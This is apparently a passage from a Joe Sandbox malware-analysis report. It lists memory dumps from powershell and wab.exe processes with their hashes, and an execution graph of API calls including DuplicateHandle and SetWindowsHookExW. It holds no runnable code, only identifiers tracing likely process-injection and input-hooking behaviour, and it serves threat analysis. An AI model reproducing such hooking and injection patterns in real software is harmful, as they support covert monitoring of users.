                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fd9298fcf002fb544ad528e59f871c6a67bce2d00915774a497c067cae9329c2
                                                                                                        • Instruction ID: d749986e6c618adde58003ee561896ca3a81ba2365eae7d0eefc520c1d44375e
                                                                                                        • Opcode Fuzzy Hash: fd9298fcf002fb544ad528e59f871c6a67bce2d00915774a497c067cae9329c2
                                                                                                        • Instruction Fuzzy Hash: 7CF0E235A093609FD752CB65C849E16FB71AF82215B1CD0D6E2858F092C731D943CB60
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1421fa87b95f638258ebd3bda8b14675ace5bd65996236ef9720efb53c966783
                                                                                                        • Instruction ID: 123421fb43f70c3932ba4bd8adaa72c33481e7da2855bf1a10c3909232c1add1
                                                                                                        • Opcode Fuzzy Hash: 1421fa87b95f638258ebd3bda8b14675ace5bd65996236ef9720efb53c966783
                                                                                                        • Instruction Fuzzy Hash: 4AF05435A00118AFCF50CB89D8509EDF7B6FF8C221B248159E469B3251C732DD52CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 67578998e498f67ccc00bcd27d352d4d1283bf4c6fdcc3abccce38f0bbd78641
                                                                                                        • Instruction ID: cf2d24951f0c9c43dfaafbebc2cb6ad2c5b9edc4cd4ad2fe8b4c71d6aaf80fa6
                                                                                                        • Opcode Fuzzy Hash: 67578998e498f67ccc00bcd27d352d4d1283bf4c6fdcc3abccce38f0bbd78641
                                                                                                        • Instruction Fuzzy Hash: EBE04F35B012148FDB01CB58DC916EDF3B1EF89224B2482A9D428DB2A2C7369D07CB90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl
                                                                                                        • API String ID: 0-747792303
                                                                                                        • Opcode ID: 77dc74880826888ffcdc51741bbb37246254340dcc9df79ada7ee934753f87c3
                                                                                                        • Instruction ID: f0f7cd7f48d86e3eecfc872d839defe381b9fb32c7593a77940d7130a3f59e54
                                                                                                        • Opcode Fuzzy Hash: 77dc74880826888ffcdc51741bbb37246254340dcc9df79ada7ee934753f87c3
                                                                                                        • Instruction Fuzzy Hash: 54C1CFB0E00324DBDF64CFA4C919B6AB7F2AF89314F24942AD8466B744CB71EC41CB95
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl$(fl$(fl$4l$4l
                                                                                                        • API String ID: 0-2748119719
                                                                                                        • Opcode ID: 7995e9a853aeaaada5ef9765abf3c566ec2946c95e599b57fdb993a80dbae443
                                                                                                        • Instruction ID: 4286f42a719997d1a6397e2ba336f779a54f3e24125bc40df5201b7293b0e4b5
                                                                                                        • Opcode Fuzzy Hash: 7995e9a853aeaaada5ef9765abf3c566ec2946c95e599b57fdb993a80dbae443
                                                                                                        • Instruction Fuzzy Hash: B961C070F00314DFDB64CB68C859BAAB7F3AF89218F249469D406AB355DB71EC42CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: l$l$l$l
                                                                                                        • API String ID: 0-2658161240
                                                                                                        • Opcode ID: 53940227aa8a349694c0b46a557f80465ec8389517e04e5ce6258de17441968f
                                                                                                        • Instruction ID: 17a7f659b7fa57867c10300aec560a7af225f3a77e6a30462f2c943cb3c91641
                                                                                                        • Opcode Fuzzy Hash: 53940227aa8a349694c0b46a557f80465ec8389517e04e5ce6258de17441968f
                                                                                                        • Instruction Fuzzy Hash: B5F12632F043259FDBA49F6894197AABBB2AFC5224F24806AD446DF351DB31CD41CBA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 84l$84l$84l$84l
                                                                                                        • API String ID: 0-3024328185
                                                                                                        • Opcode ID: d72685cbc04c345712328b52e34f33c72a80c9a69050498ee73bf7d7848c4dfa
                                                                                                        • Instruction ID: 3b9c38902f4c2499d45f85516da4d85f30ce03e21cea25e927763ec83a797b54
                                                                                                        • Opcode Fuzzy Hash: d72685cbc04c345712328b52e34f33c72a80c9a69050498ee73bf7d7848c4dfa
                                                                                                        • Instruction Fuzzy Hash: A6D12931B003649FDB65DF64C409B6ABBB2AFC5314F64846AE806AF391DB71DC41CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl$(fl$(fl
                                                                                                        • API String ID: 0-2123353879
                                                                                                        • Opcode ID: e87f87b44433781ef5ecb317ba6379443d78e9a0aed939711293f1b945b2091c
                                                                                                        • Instruction ID: ce05d22c5f1bc2f95529ad61cdc8be4076bb0ce69ecca301a165b6a91c80d500
                                                                                                        • Opcode Fuzzy Hash: e87f87b44433781ef5ecb317ba6379443d78e9a0aed939711293f1b945b2091c
                                                                                                        • Instruction Fuzzy Hash: CBF19374E00324DFDB64CFA4C949A6AB7B2BF89318F249169D805AF745CB71EC42CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl$(fl$(fl
                                                                                                        • API String ID: 0-2123353879
                                                                                                        • Opcode ID: 990fcc4ce7b1b766f6c5ec532df5d52a81427a9042729f53fde9ceb4577b797f
                                                                                                        • Instruction ID: c7871425140c87f1410dce8a2d05c97fd42cf52026048b28623595c4f01fbf3d
                                                                                                        • Opcode Fuzzy Hash: 990fcc4ce7b1b766f6c5ec532df5d52a81427a9042729f53fde9ceb4577b797f
                                                                                                        • Instruction Fuzzy Hash: B1A1BCB4E00324DFDF64CF94C458AAAB7B2BF89319F24956AD8066B744C732EC41CB84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl$(fl$(fl
                                                                                                        • API String ID: 0-2123353879
                                                                                                        • Opcode ID: f1b54ac561b2005fa775bb78850c58fa11d76f57196b337b35ac47d5a710d01c
                                                                                                        • Instruction ID: 6691ed014a4e2781c1c53a420950a7f8bd37c8f59da2b03800eab8277d3a748a
                                                                                                        • Opcode Fuzzy Hash: f1b54ac561b2005fa775bb78850c58fa11d76f57196b337b35ac47d5a710d01c
                                                                                                        • Instruction Fuzzy Hash: 71718EB0E00314DFDB64CF94C549AAABBB2AF89314F249069E805AF355CB71EC42CF95

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:5.5%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:14
                                                                                                        Total number of Limit Nodes:2
                                                                                                        execution_graph 14541 22fd7128 14542 22fd716e GetCurrentProcess 14541->14542 14544 22fd71b9 14542->14544 14545 22fd71c0 GetCurrentThread 14542->14545 14544->14545 14546 22fd71fd GetCurrentProcess 14545->14546 14547 22fd71f6 14545->14547 14548 22fd7233 14546->14548 14547->14546 14549 22fd725b GetCurrentThreadId 14548->14549 14550 22fd728c 14549->14550 14535 22fd7370 DuplicateHandle 14536 22fd7406 14535->14536 14537 22fd2270 14538 22fd22b4 SetWindowsHookExW 14537->14538 14540 22fd22fa 14538->14540

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 22FD71A6
                                                                                                        • GetCurrentThread.KERNEL32 ref: 22FD71E3
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 22FD7220
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 22FD7279
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3134787188.0000000022FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 22FD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_22fd0000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: 8f01c36f247a5c660118bcb4b1be80deeac18fcceaa1d495ebd2eae2e290dbbd
                                                                                                        • Instruction ID: d6bf56387ee857d8dd1bc56d24aea7fbf5141ff356f87444cafcafd80f422a4a
                                                                                                        • Opcode Fuzzy Hash: 8f01c36f247a5c660118bcb4b1be80deeac18fcceaa1d495ebd2eae2e290dbbd
                                                                                                        • Instruction Fuzzy Hash: AD5188B19003498FDB14CFAAD588BEEBBF1EF48300F248559E559AB360D7745880CF65

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 22FD71A6
                                                                                                        • GetCurrentThread.KERNEL32 ref: 22FD71E3
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 22FD7220
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 22FD7279
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3134787188.0000000022FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 22FD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_22fd0000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: d794cf4aa1a43b13ef569a5f321254878a648d645f7ef843abc46741ca6c4246
                                                                                                        • Instruction ID: 1f4026df2d3fb6816175042f46b096d64ec98a3b389a07d474eea517ae5ce54a
                                                                                                        • Opcode Fuzzy Hash: d794cf4aa1a43b13ef569a5f321254878a648d645f7ef843abc46741ca6c4246
                                                                                                        • Instruction Fuzzy Hash: F85167B19003498FDB14DFAAD584BDEBBF1AF48300F248559E519AB350D7746980CF65

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 44 22fd7368-22fd736d 45 22fd736f 44->45 46 22fd7372-22fd7404 DuplicateHandle 44->46 45->46 47 22fd740d-22fd742a 46->47 48 22fd7406-22fd740c 46->48 48->47
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 22FD73F7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3134787188.0000000022FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 22FD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_22fd0000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: cd3a25e06b9c6d8a2d7764da1114393dd18428af5f2b7ed2d869a033d2c84553
                                                                                                        • Instruction ID: d204af300c52c98cc0cd6aa9f39e4d3caeb6c6e8c3a3e57995173ac305fbcf0d
                                                                                                        • Opcode Fuzzy Hash: cd3a25e06b9c6d8a2d7764da1114393dd18428af5f2b7ed2d869a033d2c84553
                                                                                                        • Instruction Fuzzy Hash: A921E3B6D00349EFDB10CFAAD984AEEFBF5EB48310F14841AE954A7210D374A951CFA5

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 51 22fd7370-22fd7404 DuplicateHandle 52 22fd740d-22fd742a 51->52 53 22fd7406-22fd740c 51->53 53->52
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 22FD73F7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3134787188.0000000022FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 22FD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_22fd0000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 56 22fd2269-22fd22ba 59 22fd22bc 56->59 60 22fd22c6-22fd22f8 SetWindowsHookExW 56->60 63 22fd22c4 59->63 61 22fd22fa-22fd2300 60->61 62 22fd2301-22fd2326 60->62 61->62 63->60
                                                                                                        APIs
                                                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 22FD22EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3134787188.0000000022FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 22FD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_22fd0000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HookWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 2559412058-0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 67 22fd2270-22fd22ba 69 22fd22bc 67->69 70 22fd22c6-22fd22f8 SetWindowsHookExW 67->70 73 22fd22c4 69->73 71 22fd22fa-22fd2300 70->71 72 22fd2301-22fd2326 70->72 71->72 73->70
                                                                                                        APIs
                                                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 22FD22EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3134787188.0000000022FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 22FD0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_22fd0000_wab.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HookWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 2559412058-0